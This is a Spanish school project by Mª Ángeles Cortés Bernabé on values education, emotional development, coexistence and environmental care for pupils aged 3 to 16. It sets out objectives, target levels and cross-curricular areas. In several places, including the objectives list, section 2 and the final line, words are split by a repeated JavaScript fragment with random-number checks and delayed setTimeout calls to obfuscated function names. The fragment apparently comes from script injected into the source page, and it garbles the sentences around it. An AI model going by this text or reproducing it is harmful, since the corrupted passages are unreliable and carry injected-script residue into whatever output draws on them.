PROYECTO DE EDUCACIÓN EN VALORES Y CUIDADO DEL MEDIO AMBIENTE EN LA ESCUELA

Autora: Mª Ángeles Cortés Bernabé

1.- OBJETIVOS DEL PROYECTO

A) Como objetivos- eje del Proyecto:

  • Formación integral de los alumnos/as (3 a 16 años) en sus tres niveles:

   Conocimientos, destrezas y valores.

  • Fomentar los hábitos de comportamiento democrático para percibir un favorable clima de convivencia: Formandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando mejores individuos en el respeto y la tolerancia, tanto a corto como a largo plazo.
  • Lograr una autoconciencia emocional
  • Conseguir un adecuado control de las emociones
  • Desarrollar la empatía para comprender las emociones de los demás.
  •  Mejorar las relaciones interpersonales
  • Formar para la defensa y respeto del Medio Ambiente
  • Implicar a toda la comunidad educativa en este proyecto impulsados por el entusiasmo: docentes, alumnado, familia.  Hemos de trabajar para una relación fluida y productiva.

* Mejorar  la convivencia en el Centro como prevención de posibles conflictos escolares.

               * Fomentar nexos de conexión entre Centro y Familia.


   B) Como objetivos específicos:

  • Establecer límites en la actividad del alumno de modo que comprenda que el deseo subjetivo no puede ser absoluto. Mostrar al alumno la existencia de unas reglas ajenas a él, que deben respetarse.
  • Desarrollar la capacidad de autocontrol del alumno.
  • Fomentar el crecimiento del alumno como persona que aprende, siente, decide y actúa.
  • Adquirir conciencia de los valores presentes en el ambiente familiar y social.
  • Mantener conductas coherentes con los valores que se deciden apoyar.
  • Reconocer las leyes y las normas sociales como medio para garantizar el respeto a los valores compartidos.
  • Fomentar la participación social responsable y el afán por influir positivamente en la sociedad, con espíritu de servicio.
  • Reaccionar ante las propuestas de valores implícitos o explícitos con actitudes de preferencia, evaluación, disponibilidad y apertura.
  • Iniciar la formación del carácter mediante el ejercicio en la vida diaria de hábitos básicos.
  • Hacer un adecuado reconocimiento e identificación de las emociones que vivimos
  • Tolerar mejor la frustración
  • Reducir la conflictividad con las personas que vivimos (eliminandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las agresiones verbales y físicas, y el estilo agresivo de comportamiento interpersonal), aprendiendo a ser tolerantes.
  • Mostrarse sensible hacia los sentimientos de los demás
  • Identificar las situaciones problemáticas, los conflictos y las causas
  • Hacer propuestas adecuadas para la resolución de conflictos
  • Aumentar las habilidades de comunicación
  • Sensibilizarse ante la problemática del Medio Ambiente
  • Aprender a proteger el entorno natural y promover sus recursos como contexto de desarrollo humano
  • Participar responsablemente en las actividades de la comunidad y prepararse para ejercer en plenitud los derechos y cumplir los deberes personales que reconoce y demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda la vida social de carácter democrático.

2.- Nivel/es educativo al que se dirige.

               Este proyecto está inmerso en parámetros preventivos, ya que defiende la idea de trabajar la fundamentación de la que se habla en él, desde la más temprana edad, puesto que confiamos en que el alumno/a aprenda, conviva e interiorice todos los objetivos y los prolongue en su actividad cotidiana desde sus inicios.

               Por ello, hacemos extensivo este proyecto a toda la Comunidad Educativa, especialmente a todo el alumnado, desde que comienzan su escolarización a los 3 años hasta que finalizan sus estudios obligatorios de E.S.O.

               De acuerdo con lo que afirma la LOE, intentamos ofrecer una propuesta de educación en valores a tener en cuenta en las diferentes áreas: los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes valores que configuran los más importantes ejes transversales y las actitudes y normas globales que hay que tener en cuenta en todas las actividades educativas y también en cualquier relación educativa de convivencia e interrelación.

          Quizás el punto donde los valores se revelen de una forma más explícita es en las actitudes, por lo que debemos considerar nuestra acción educativa como una acción fundamentalmente humanizadora, es decir, una acción que potencie y favorezca en los alumnos la interiorización y el desarrollo de los valores humanos.

          Los contenidos deben hacer referencia a los temas o enseñanzas transversales cuyas características básicas deben ser:

          a) Contenidos que hagan referencia a los conflictos y problemas que acucian a la sociedad actual: desigualdad, insolidaridad, violencia…

          b) Contenidos referentes a valores y actitudes: los temas transversales, contribuyen de manera especial en la educación en valores morales y cívicos, entendida ésta como una educación al servicio de la formación de personas capaces de construir racional y autónomamente su propio sistema de valores a partir de ellos, capaces también de enjuiciar críticamente la realidad que les ha tocado vivir e intervenir para transformarla y mejorarla

          c) Estos contenidos implican un enfoque globalizador e interdisciplinar y una responsabilidad compartida por el profesorado en todas las áreas.

           Los parámetros educacionales en los que se apoya el proyecto no corresponden a una única área educativa sino que están presentes en los objetivos y contenidos de todas ellas, teniendo un carácter multidisciplinar, siendo responsabilidad del profesorado y, por extensión, de toda la comunidad educativa. Aborda la Educación para la paz, para la igualdad de oportunidades entre los sexos(coeducación), educación ambiental, educación sexual, educación para la salud, educación del consumidor y educación vial.


 

3.- ÁREAS FORMATIVAS

Debemos apoyar nuestra actuación en los siguientes pilares:

  • La escuela ha de interesarse y ocuparse de la educación moral como parte de la educación integral de la persona, ayudandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}